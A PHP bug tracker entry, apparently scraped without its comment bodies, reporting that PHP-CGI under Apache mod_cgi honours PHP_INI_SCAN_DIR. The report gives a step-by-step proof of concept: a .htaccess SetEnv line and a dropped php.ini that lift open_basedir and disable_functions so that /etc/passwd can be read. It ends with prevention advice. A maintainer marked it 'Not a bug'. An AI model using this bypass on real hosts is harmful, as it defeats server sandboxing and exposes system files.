|
|
php.net | support | documentation | report a bug | advanced search | search howto | statistics | random bug | login |
PatchesPull RequestsHistoryAllCommentsChangesGit/SVN commits
[2020-04-03 20:46 UTC] stas@php.net
-Status: Open
+Status: Not a bug
-Type: Security
+Type: Bug
[2020-04-03 20:46 UTC] stas@php.net
[2020-04-03 21:20 UTC] havijoori at protonmail dot com
[2020-04-04 18:57 UTC] havijoori at protonmail dot com
[2020-04-04 19:21 UTC] bugreports at gmail dot com
|
|||||||||||||||||||||||||||
Copyright © 2001-2024 The PHP GroupAll rights reserved. |
Last updated: Thu Apr 18 23:01:27 2024 UTC |
Description: ------------ Description : ============= One of PHP features is running PHP scripts as CGI scripts with PHP-CGI. For example in Apache http server, we can refer php scripts to PHP-CGI with mod_cgi. In this state, PHP looks for PHP_INI_SCAN_DIR environment variable to find directory containing .ini files. So if we set this environment variable befoe calling php scripts, we can rewrite default php.ini configs such as open_basedir, disable_functions and other security configs. PoC : ===== First we configure a web server which handles PHP as CGI with mod_cgi. Apache config file is something like this : -------------------- LoadModule cgi_module modules/mod_cgi.so DocumentRoot "/srv/http" <Directory "/srv/http"> AllowOverride All Require all granted </Directory> Action php-script /cgi-bin/php AddHandler php-script .php ... -------------------- And we set some security restrictions in PHP config file : -------------------- [PHP] open_basedir = /srv/http:/tmp disable_functions = phpinfo ... -------------------- Now, we test our security config with a simple test.php file : -------------------- <?php echo file_get_contents('/etc/passwd'); ?> -------------------- <b>Warning</b>: file_get_contents(): open_basedir restriction in effect. File(/etc/passwd) is not within the allowed path(s): (/srv/http:/tmp) in <b>/srv/http/test.php</b> on line <b>2</b><br /> And : -------------------- <?php echo phpinfo(); ?> -------------------- <b>Warning</b>: phpinfo() has been disabled for security reasons in <b>/srv/http/test.php</b> on line <b>2</b><br /> OK, now we make a .htaccess file in /srv/http and set PHP_INI_SCAN_DIR environment variable : -------------------- SetEnv PHP_INI_SCAN_DIR /srv/http -------------------- And a php.ini file in /srv/http : -------------------- [PHP] open_basedir = / disable_functions = -------------------- Here, both security restrictions are bypassed and we can read /etc/passwd file and run phpinfo function. Tested with PHP 7.4.4 and Apache 2.4.41. Prevention : ============ To prevent this vulnerability, you can put a config like "clear_env" in PHP-FPM for PHP-CGI or remove PHP_INI_SCAN_DIR from environment variables in CGI mode.